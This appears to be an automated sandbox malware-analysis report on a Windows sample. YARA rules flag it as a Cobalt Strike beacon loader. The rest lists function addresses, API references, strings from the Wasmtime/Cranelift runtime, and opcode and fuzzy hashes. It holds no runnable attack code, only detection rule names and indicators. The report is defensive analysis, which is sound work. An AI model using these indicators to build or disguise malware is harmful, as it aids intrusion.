beacon sleep obfuscation routine, Source: 00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	0.6%
Signature Coverage:	19.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	66

Executed Functions

Function 00007FF66E05ADEF Relevance: 64.5, APIs: 34, Strings: 7, Instructions: 3010COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E05B299

Strings

assertion failed: frame_layout.clobbered_callee_saves.is_empty(), xrefs: 00007FF66E05E956
q, xrefs: 00007FF66E05D0F5
capacity overflow, xrefs: 00007FF66E05E639
1, xrefs: 00007FF66E05BC00
[, xrefs: 00007FF66E05D024
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF66E05E601, 00007FF66E05E694, 00007FF66E05E890, 00007FF66E05E92B
assertion failed: end >= start && end <= len, xrefs: 00007FF66E05E96E

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: 1$[$assertion failed: end >= start && end <= len$assertion failed: frame_layout.clobbered_callee_saves.is_empty()$called `Result::unwrap()` on an `Err` value$capacity overflow$q
API String ID: 3510742995-962046948
Opcode ID: a1f9bbbf8aab68fbef88d7b11f853fe7a14e5f2df70a8b0038a84add42dbe907
Instruction ID: 8345160af95a3b186c4833da3ac45e5ba0e1fcd4421a353a1bdb08ea6a907a47
Opcode Fuzzy Hash: a1f9bbbf8aab68fbef88d7b11f853fe7a14e5f2df70a8b0038a84add42dbe907
Instruction Fuzzy Hash: 0C639172A0CBC2C1EA709B15E5443EAA371FB94B84F404136EA8D9BB99DF3CE155CB44

Function 00007FF66E05F1AE Relevance: 41.3, APIs: 15, Strings: 9, Instructions: 5313COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E060331
memcpy.MSVCRT ref: 00007FF66E060902
memcpy.MSVCRT ref: 00007FF66E060B22

Strings

register allocation, xrefs: 00007FF66E0658FD
unexpected parallel_move in body (non-edge), xrefs: 00007FF66E065A19
unexpected edge_inst: not a parallel move, xrefs: 00007FF66E065731
register allocation checker, xrefs: 00007FF66E065D59
assertion failed: sret_reg.is_none(), xrefs: 00007FF66E065D07
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF66E065B15
assertion failed: regs.len() == 1, xrefs: 00007FF66E065CEF
, unexpected token, expected one of: , xrefs: 00007FF66E0631A8
assertion failed: sret_reg.is_some(), xrefs: 00007FF66E06152A

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: , unexpected token, expected one of: $assertion failed: regs.len() == 1$assertion failed: sret_reg.is_none()$assertion failed: sret_reg.is_some()$called `Result::unwrap()` on an `Err` value$register allocation$register allocation checker$unexpected edge_inst: not a parallel move$unexpected parallel_move in body (non-edge)
API String ID: 3510742995-1172243485
Opcode ID: 3044cc14a6cab2a3cae178dcb1202a4a358853f968dd4f6ca0e9ae6f4406eca8
Instruction ID: 1493a1ae999f0d3cda3a3048738234e58e03c34d66eff40cce4b6fafa401f91e
Opcode Fuzzy Hash: 3044cc14a6cab2a3cae178dcb1202a4a358853f968dd4f6ca0e9ae6f4406eca8
Instruction Fuzzy Hash: DFC36E76A08BC1C1EA219B15E4503EEA3B0FB98784F405136EB8D9BB99DF3CD595CB04

Function 00007FF66DFA491A Relevance: 38.1, APIs: 8, Strings: 16, Instructions: 2116COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF66DFA24CF

Strings

g], xrefs: 00007FF66DFAADA4
assertion failed: !ptr.is_null()/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-runtime-17.0.3/src/instance.rs, xrefs: 00007FF66DFAACDA
B^, xrefs: 00007FF66DFAACC9
customnameproducersmetadata.code.branch_hint, xrefs: 00007FF66DFA8193
assertion failed: edge.height == self.node.height - 1, xrefs: 00007FF66DFAAD29
type mismatch with parameterstype mismatch with resultsmust use async instantiation when async support is enabled, xrefs: 00007FF66DFA920D, 00007FF66DFA9328
dylink.0corefuncvaluetypecomponentinstancemoduleinterfacebools8u8s16u16s32u32s64u64f32f64float32float64charstringrecordvariantlisttupleflagsenumoptionresultownborrowbinding-weakbinding-localvisibility-hiddenundefinedexportedexplicit-nameno-striptlsabsolute, xrefs: 00007FF66DFA81EA
Cache system should be enabled and all settings must be validated or defaulted/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-cache-17.0.3/src/config.rs, xrefs: 00007FF66DFAAC4A
read_wasm_at_indexNot found read_wasm_at_index, xrefs: 00007FF66DFA91A8
get_wasm_mem_sizeNot found get_wasm_mem_size, xrefs: 00007FF66DFA9163
expected `(`, xrefs: 00007FF66DFAA58F
Q'", xrefs: 00007FF66DFAA8B4
assertion failed: idx < CAPACITY/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\alloc\src\collections\btree\node.rs, xrefs: 00007FF66DFAAD72, 00007FF66DFAAE47
assertion failed: self.element_type() == TableElementType::Func, xrefs: 00007FF66DFAACB6
multiple start sections foundexpected valid module field/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wast-219.0.1/src/core/binary.rs, xrefs: 00007FF66DFA803A
expected `)`item nesting too deep, xrefs: 00007FF66DFA8733, 00007FF66DFAA778

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memset
String ID: Cache system should be enabled and all settings must be validated or defaulted/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-cache-17.0.3/src/config.rs$assertion failed: !ptr.is_null()/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-runtime-17.0.3/src/instance.rs$assertion failed: edge.height == self.node.height - 1$assertion failed: idx < CAPACITY/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\alloc\src\collections\btree\node.rs$assertion failed: self.element_type() == TableElementType::Func$customnameproducersmetadata.code.branch_hint$dylink.0corefuncvaluetypecomponentinstancemoduleinterfacebools8u8s16u16s32u32s64u64f32f64float32float64charstringrecordvariantlisttupleflagsenumoptionresultownborrowbinding-weakbinding-localvisibility-hiddenundefinedexportedexplicit-nameno-striptlsabsolute$expected `(`$expected `)`item nesting too deep$get_wasm_mem_sizeNot found get_wasm_mem_size$multiple start sections foundexpected valid module field/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wast-219.0.1/src/core/binary.rs$read_wasm_at_indexNot found read_wasm_at_index$type mismatch with parameterstype mismatch with resultsmust use async instantiation when async support is enabled$B^$Q'"$g]
API String ID: 2221118986-304987011
Opcode ID: fddbca585abf2ec3a7625c2c7d471a9bedaca2525d2a5c34371c1e3d5cdc6b00
Instruction ID: 09d0c69e1ae7095805dd1298637c020755742cb9677cf21ae0ee37890e8cc121
Opcode Fuzzy Hash: fddbca585abf2ec3a7625c2c7d471a9bedaca2525d2a5c34371c1e3d5cdc6b00
Instruction Fuzzy Hash: 7C337032A0DBC2C1EA209B15E4503EAB3B1FB98B84F444136DA8D9BB99EF7DD545C740

Function 00007FF66DFA5080 Relevance: 37.6, APIs: 2, Strings: 22, Instructions: 1645COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66DFA50B4
memcpy.MSVCRT ref: 00007FF66DFA54A0

Strings

Ge(, xrefs: 00007FF66DFA7E53
g], xrefs: 00007FF66DFAADA4
assertion failed: !ptr.is_null()/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-runtime-17.0.3/src/instance.rs, xrefs: 00007FF66DFAACDA
B^, xrefs: 00007FF66DFAACC9
:e(, xrefs: 00007FF66DFA7E60
customnameproducersmetadata.code.branch_hint, xrefs: 00007FF66DFA6024, 00007FF66DFA6ACE, 00007FF66DFA8193
assertion failed: edge.height == self.node.height - 1, xrefs: 00007FF66DFAAD29
compilation settings are not compatible with the native host/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-17.0.3/src/module.rsfailed to parse WebAssembly module, xrefs: 00007FF66DFA56C8
type mismatch with parameterstype mismatch with resultsmust use async instantiation when async support is enabled, xrefs: 00007FF66DFA920D
dylink.0corefuncvaluetypecomponentinstancemoduleinterfacebools8u8s16u16s32u32s64u64f32f64float32float64charstringrecordvariantlisttupleflagsenumoptionresultownborrowbinding-weakbinding-localvisibility-hiddenundefinedexportedexplicit-nameno-striptlsabsolute, xrefs: 00007FF66DFA6083, 00007FF66DFA6B25, 00007FF66DFA81EA
failed to allocate default callee, xrefs: 00007FF66DFAABAA
read_wasm_at_indexNot found read_wasm_at_index, xrefs: 00007FF66DFA91A8
cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs, xrefs: 00007FF66DFAAC28
get_wasm_mem_sizeNot found get_wasm_mem_size, xrefs: 00007FF66DFA9163
expected `(`, xrefs: 00007FF66DFA638B, 00007FF66DFA6E51
Te(, xrefs: 00007FF66DFA7E46
assertion failed: idx < CAPACITY/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\alloc\src\collections\btree\node.rs, xrefs: 00007FF66DFAAE47
assertion failed: self.element_type() == TableElementType::Func, xrefs: 00007FF66DFAACB6
e(, xrefs: 00007FF66DFA7E7A
s%, xrefs: 00007FF66DFA56D5
tablememoryglobaltagelemdatalocalexpected `Num`, xrefs: 00007FF66DFA5EF7
-e(, xrefs: 00007FF66DFA7E6D

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: !ptr.is_null()/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-runtime-17.0.3/src/instance.rs$assertion failed: edge.height == self.node.height - 1$assertion failed: idx < CAPACITY/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\alloc\src\collections\btree\node.rs$assertion failed: self.element_type() == TableElementType::Func$cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs$compilation settings are not compatible with the native host/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-17.0.3/src/module.rsfailed to parse WebAssembly module$customnameproducersmetadata.code.branch_hint$dylink.0corefuncvaluetypecomponentinstancemoduleinterfacebools8u8s16u16s32u32s64u64f32f64float32float64charstringrecordvariantlisttupleflagsenumoptionresultownborrowbinding-weakbinding-localvisibility-hiddenundefinedexportedexplicit-nameno-striptlsabsolute$expected `(`$failed to allocate default callee$get_wasm_mem_sizeNot found get_wasm_mem_size$read_wasm_at_indexNot found read_wasm_at_index$tablememoryglobaltagelemdatalocalexpected `Num`$type mismatch with parameterstype mismatch with resultsmust use async instantiation when async support is enabled$ e($-e($:e($B^$Ge($Te($g]$s%
API String ID: 3510742995-1110042966
Opcode ID: 9360b872b6e97294046309baf92658c867457869f1cd208d2a96838b060c34f1
Instruction ID: d0292ec5abaf6e6db18d05a19f15633aad346ec198ab506192b64efcbe837bff
Opcode Fuzzy Hash: 9360b872b6e97294046309baf92658c867457869f1cd208d2a96838b060c34f1
Instruction Fuzzy Hash: 63137E32A09BC2C2E7609B11E4503EAB375FB99B84F444136EA8D9BB85EF3CE155C744

Function 00007FF66DFA3392 Relevance: 37.5, APIs: 11, Strings: 13, Instructions: 1464COMMON

Download Yara Rule

Strings

g], xrefs: 00007FF66DFAADA4
assertion failed: edge.height == self.node.height - 1, xrefs: 00007FF66DFAAD29
inlineisa_defaultsetting is configured to which is not supported, xrefs: 00007FF66DFA3AB5
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF66DFA6675
r-, xrefs: 00007FF66DFA7C90
failed to create table pool mappingtotal size of tables exceeds addressable memory, xrefs: 00007FF66DFA4DD5
%, xrefs: 00007FF66DFA3CF4
preserve_frame_pointersprobestack_strategyenable_llvm_abi_extensionsenable_pinned_reguse_colocated_libcallsuse_pinned_reg_as_heap_baseenable_safepointsunwind_infoenable_heap_access_spectre_mitigationenable_table_access_spectre_mitigationenable_nan_canonicaliza, xrefs: 00007FF66DFA3D2C
false, xrefs: 00007FF66DFA3C9A
Q'", xrefs: 00007FF66DFAA8B4
assertion failed: idx < CAPACITY/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\alloc\src\collections\btree\node.rs, xrefs: 00007FF66DFAAE47
true, xrefs: 00007FF66DFA3C93, 00007FF66DFA3D0F, 00007FF66DFA3D49, 00007FF66DFA3DA6
probestack_strategyenable_llvm_abi_extensionsenable_pinned_reguse_colocated_libcallsuse_pinned_reg_as_heap_baseenable_safepointsunwind_infoenable_heap_access_spectre_mitigationenable_table_access_spectre_mitigationenable_nan_canonicalizationenable_jump_tablese, xrefs: 00007FF66DFA3A98

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: %$assertion failed: edge.height == self.node.height - 1$assertion failed: idx < CAPACITY/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\alloc\src\collections\btree\node.rs$called `Result::unwrap()` on an `Err` value$failed to create table pool mappingtotal size of tables exceeds addressable memory$false$inlineisa_defaultsetting is configured to which is not supported$preserve_frame_pointersprobestack_strategyenable_llvm_abi_extensionsenable_pinned_reguse_colocated_libcallsuse_pinned_reg_as_heap_baseenable_safepointsunwind_infoenable_heap_access_spectre_mitigationenable_table_access_spectre_mitigationenable_nan_canonicaliza$probestack_strategyenable_llvm_abi_extensionsenable_pinned_reguse_colocated_libcallsuse_pinned_reg_as_heap_baseenable_safepointsunwind_infoenable_heap_access_spectre_mitigationenable_table_access_spectre_mitigationenable_nan_canonicalizationenable_jump_tablese$true$Q'"$g]$r-
API String ID: 0-3521788614
Opcode ID: ca5440a257c4f5d5c68ef4a7a049e2163b5a0107166b5dda1d46252e6a01b06c
Instruction ID: 861d9c4f2e00b8a2fca1605ecf6ceb5c3bf1041553ad8cbf40cdcf45ffe23aae
Opcode Fuzzy Hash: ca5440a257c4f5d5c68ef4a7a049e2163b5a0107166b5dda1d46252e6a01b06c
Instruction Fuzzy Hash: 67F26A62A0DBC2C5EA319B15E4503EAB3B0FB99784F444136DA8D8BB99EF3CD145CB44

Function 00007FF66E055AFA Relevance: 27.1, APIs: 3, Strings: 14, Instructions: 1647COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF66E055C9D

Part of subcall function 00007FF66E00D1B5: memcpy.MSVCRT ref: 00007FF66E00D21A

Part of subcall function 00007FF66E00A138: memcpy.MSVCRT ref: 00007FF66E00A19B

Strings

q, xrefs: 00007FF66E0564B2
capacity overflow, xrefs: 00007FF66E057BDF
], xrefs: 00007FF66E057670
Edge block succ must be body block, xrefs: 00007FF66E057C32
lower_branch_blockparam_args called on a critical edge!, xrefs: 00007FF66E057BCF
q, xrefs: 00007FF66E0573C1
q, xrefs: 00007FF66E057620
^, xrefs: 00007FF66E0576A3
Y, xrefs: 00007FF66E0574BD
L, xrefs: 00007FF66E0562E7
every side-effecting inst should have a color-map entry, xrefs: 00007FF66E057C03
q, xrefs: 00007FF66E05728E
^, xrefs: 00007FF66E057600
q, xrefs: 00007FF66E056245

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: Edge block succ must be body block$L$Y$]$^$^$capacity overflow$every side-effecting inst should have a color-map entry$lower_branch_blockparam_args called on a critical edge!$q$q$q$q$q
API String ID: 3510742995-2479579835
Opcode ID: 65f7b6e5459c25a89ad34e864de0de0aefbd98bc8324f9e02fed72a867ba386c
Instruction ID: a9af67e68a7f39ec3c956ad5eac2cc40bf4833df740a88663f5380e2f6dffe6d
Opcode Fuzzy Hash: 65f7b6e5459c25a89ad34e864de0de0aefbd98bc8324f9e02fed72a867ba386c
Instruction Fuzzy Hash: 3B03A176A08AC2C2EA60DB15E4443EEB374FB94784F444136EA8D8B79ADF3CE555CB04

Function 00007FF66E022626 Relevance: 23.4, APIs: 6, Strings: 7, Instructions: 3869COMMON

Download Yara Rule

Strings

?, xrefs: 00007FF66E026BB2
Imm64Offset32, xrefs: 00007FF66E026DBA
capacity overflow, xrefs: 00007FF66E026CE9
Invalid operand: fixed constraint on Def/Mod at Early position, xrefs: 00007FF66E026D25
Invalid operand: fixed constraint on Use/Mod at Late point, xrefs: 00007FF66E026CB9
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF66E026D5F
multiple uses of vreg with a Stack constraint are not supported, xrefs: 00007FF66E026C53

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: ?$Imm64Offset32$Invalid operand: fixed constraint on Def/Mod at Early position$Invalid operand: fixed constraint on Use/Mod at Late point$called `Result::unwrap()` on an `Err` value$capacity overflow$multiple uses of vreg with a Stack constraint are not supported
API String ID: 0-1284797997
Opcode ID: 60b0b1b58069d5639ea24b491e4c9a41e40122d0e1bfbb294f4b0721155d4923
Instruction ID: 0b5102298be984399758201bd4f702542bacecc10ccc3f4587bac1a06a8bed37
Opcode Fuzzy Hash: 60b0b1b58069d5639ea24b491e4c9a41e40122d0e1bfbb294f4b0721155d4923
Instruction Fuzzy Hash: BD93C372A08AC2C6EA64CB55E4443EAB7B0FBA4784F404136EB9D8B795DF3CE465C704

Function 00007FF66E01BD8C Relevance: 16.4, APIs: 2, Strings: 7, Instructions: 2899COMMON

Download Yara Rule

Strings

Could not allocate minimal bundle, but the allocation problem should be possible to solve, xrefs: 00007FF66E01F97A
?, xrefs: 00007FF66E01C3BB
capacity overflow, xrefs: 00007FF66E01F90F
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF66E01F955
no entry found for key/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-environ-17.0.3/src/module_types.rs, xrefs: 00007FF66E01F7B9
?, xrefs: 00007FF66E01CB06
assertion failed: self.height > 0, xrefs: 00007FF66E01F795

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: ?$?$Could not allocate minimal bundle, but the allocation problem should be possible to solve$assertion failed: self.height > 0$called `Result::unwrap()` on an `Err` value$capacity overflow$no entry found for key/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-environ-17.0.3/src/module_types.rs
API String ID: 0-4005537490
Opcode ID: d4fb6b333c96262b77008336854d4aeed5d1d25beeb45039f9adb0abcb89bf18
Instruction ID: 21efc0b6e0b2f4595099a814a538aac2ef4cbfa769d71fcca10e2eccad915786
Opcode Fuzzy Hash: d4fb6b333c96262b77008336854d4aeed5d1d25beeb45039f9adb0abcb89bf18
Instruction Fuzzy Hash: D7637E76608AC1C2DA64CB95E4403EAB7B0FB98B84F504136EB8E9BB55DF3CE455CB04

Function 00007FF66E011963 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 2476COMMON

Download Yara Rule

Strings

current instruction removed?/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/cranelift-codegen-0.104.3/src/cursor.rs, xrefs: 00007FF66E015288
assertion failed: scale > 0, xrefs: 00007FF66E01532E
Missing vmctx parameter, xrefs: 00007FF66E015346
Instruction not in layout., xrefs: 00007FF66E015239
Replacing detached result, xrefs: 00007FF66E01517E
assertion failed: vector_ty.is_dynamic_vector(), xrefs: 00007FF66E015251
assertion failed: ty.bytes() <= 16, xrefs: 00007FF66E01535E
block missing terminator!, xrefs: 00007FF66E01518E

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: Instruction not in layout.$Missing vmctx parameter$Replacing detached result$assertion failed: scale > 0$assertion failed: ty.bytes() <= 16$assertion failed: vector_ty.is_dynamic_vector()$block missing terminator!$current instruction removed?/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/cranelift-codegen-0.104.3/src/cursor.rs
API String ID: 0-2425051935
